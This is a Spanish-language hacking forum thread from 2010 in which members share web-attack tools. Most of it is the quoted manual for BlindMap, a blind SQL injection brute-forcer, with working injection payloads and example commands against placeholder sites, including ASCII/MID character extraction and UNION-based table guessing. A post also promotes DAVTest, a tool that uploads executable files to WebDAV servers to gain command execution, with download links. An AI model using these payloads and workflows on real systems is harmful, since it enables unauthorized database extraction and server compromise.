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Re: Recopilación de herramientas para hacking web
« Respuesta #10 en: 18 Abril 2010, 08:44 am »

habia un script para blind sql que lo hizo codebreak pero ya no recuerdo donde estaba
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Re: Recopilación de herramientas para hacking web
« Respuesta #11 en: 24 Abril 2010, 18:53 pm »

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Re: Recopilación de herramientas para hacking web
« Respuesta #12 en: 2 Mayo 2010, 21:56 pm »

habia un script para blind sql que lo hizo codebreak pero ya no recuerdo donde estaba
te refieres a este ?
  ______ _ _      ____ ___      
  | ___ \ (_)     | | \/ |     
  | |_/ / |_ _ __  __| | . . | __ _ _ __
  | ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
  | |_/ / | | | | | (_| | | | | (_| | |_) |
  \____/|_|_|_| |_|\__,_\_| |_/\__,_| .__/
                   | | 
                   |_| Rev.4

 ~ [ www.codebreak.tk - codebreak1984 @gmail.com] ~
  Blind SQL Mapper - For advanced SQL Injection

Works with all mysql versions. Just desing a valid query.

Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984 @gmail.com

Usage: sql.exe -type host path injection check
 -column   Will try to find valid columns using a wordlist.
 -brute    Will try to bruteforce your query.
 -table    Will bruteforce your query with a wordlist.
host:    target server (ip or hostname)
path:    vulnerable path, including script and variable
injection:  a valid mysql query.
 -[+]     the incremental MID variable, in case of a true query.
 -[char]    the incremental char numbers to compare the column data.
 -[word]    You can test words from a wordlist. Nice to find tables.
check:    A string shown in a valid query


 sql.exe -brute "www.injectme.com" "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"

 sql.exe -column "www.injectme.com" "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

 sql.exe -table "www.injectme.com" "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

mas información posteado por OzX : http://foro.el-hacker.com/f34/blindmap-advanced-sql-injection-codebreak-68871/

DAVTest: Quickly Test & Exploit WebDAV Servers
DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

DAVTest supports:

    * Automatically send exploit files
    * Automatic randomization of directory to help hide files
    * Send text files and try MOVE to executable name
    * Basic and Digest authorization
    * Automatic clean-up of uploaded files
    * Send an arbitrary file

Download : http://code.google.com/p/davtest/
Descarga directa : http://code.google.com/p/davtest/downloads/list
Mas información : 
http://www.darknet.org.uk/2010/04/davtest-webdav-vulerability-scanning-scanner-tool/ o la pagina principal.
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Re: Recopilación de herramientas para hacking web
« Respuesta #13 en: 2 Mayo 2010, 22:33 pm »

si, ese mismo era.

Cita de: OzX
BlindMap - Advanced SQL Injection By COdebreak

Copiado de la sección privada.
Lo hice público en w4ck1ng, asi que ahora tb lo hago público acá.

(si, esta en ingles)


Here's a little app that I've made the other day.
This application is an automated blind sql injection brute-forcer. The main idea of this tool is the ability to construct custom sql injections (blind or not) and use the power of the brute force. I know there's a lot of blind sql injection tools out there, but all of them (at least the ones I know) have pre made injections to find out specific information, and doesn't give you the freedom to create your own injections with automated process.

With this tool you can create your own injections and use incremental char(n) to find out valuable information and you can even use wordlists to find out common table names, column names and so on.

The app use:
  ______ _ _      ____ ___      
  | ___ \ (_)     | | \/ |      
  | |_/ / |_ _ __  __| | . . | __ _ _ __
  | ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
  | |_/ / | | | | | (_| | | | | (_| | |_) |
  \____/|_|_|_| |_|\__,_\_| |_/\__,_| .__/
                   | |  
                   |_| Rev.4

 ~ [ [url]www.codebreak.tk[/url] - codebreak1984 @gmail.com] ~
  Blind SQL Mapper - For advanced SQL Injection

Works with all mysql versions. Just desing a valid query.

Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984 @gmail.com

Usage: sql.exe -type host path injection check
 -column   Will try to find valid columns using a wordlist.
 -brute    Will try to bruteforce your query.
 -table    Will bruteforce your query with a wordlist.
host:    target server (ip or hostname)
path:    vulnerable path, including script and variable
injection:  a valid mysql query.
 -[+]     the incremental MID variable, in case of a true query.
 -[char]    the incremental char numbers to compare the column data.
 -[word]    You can test words from a wordlist. Nice to find tables.
check:    A string shown in a valid query


 sql.exe -brute "[url]www.injectme.com"[/url] "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"

 sql.exe -column "[url]www.injectme.com"[/url] "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

 sql.exe -table "[url]www.injectme.com"[/url] "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"


Here's an example:
I have a bugged script, and I found out that there's a column called "name", so I want to find data inside that column, asociated to my search query (id=404). This query should work in mysql 3.x.

sql.exe -brute "localhost" "/system/search.php?search=404" "+AND+ASCII(MID(name,[+],1))=[char]" "404"

- Host: localhost.
- Path (and valid query): "/system/search.php?search=404"
- Injection: "+AND+ASCII(MID(name,[+],1))=[char]"
- column: name
- Using [+] and [char] for bruteforcing purpose. ("[+]" increments only when a valid match appears and "[char]" increments until a valid match).
- match: 404 (not for the ID, it's for the results in the picture).
* I know that the data already appears in the picture and there's no point to the injection, is just a POC.

This will try:


Another example: mysql 3.x
I've found another sql injection, and I want to know column names by using the following query:


So, i'll try with this:
sql.exe -column "[url]www.somesite.com"[/url] "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

- Host: ww.somesite.com
- Path (and valid query): ""/news/news.php?id=1"
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"

This will try:
* When a valid match is found, the app will print the valid column name.
** This is the only query that cannot be modified. It's pre-made.

Another example!: mysql 4.x
I've found another sql injection, and I can use "UNION" in the query... so I'll try to find out table names.

So, i'll try with this:
sql.exe -table "[url]www.somesite.com"[/url] "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

- Host: www.somesite.com
- Path & Valid Injection (Nº of columns): "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]"
- Using "[word]" as a variable where the words extracted from the wordlist will be.
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"
* When a valid match is found, the app will print the valid word.

Of course they're are just examples, you can make your own valid queries.
The main idea of this app is to have an extra hand in the time when the process could be automated, because as you can see, is not that user friendly and is more like and advanced tool.

You can download it here:


BlindMap - Advanced SQL Injection By COdebreak
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Re: Recopilación de herramientas para hacking web
« Respuesta #14 en: 5 Mayo 2010, 04:15 am »

pero el condenado de codebreak la pasaba en exe ... ÑE¡
La de LoginRoot igual esta genial.

« Última modificación: 5 Mayo 2010, 06:18 am por sirdarckcat » En línea


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Re: Recopilación de herramientas para hacking web
« Respuesta #15 en: 5 Julio 2010, 19:38 pm »

 :Dgenial los aportes gracias a todos me encanta como poneis la info  i un par las explicaron en la conferencia de la  owasp su creador  ;-) ;-) ;-)
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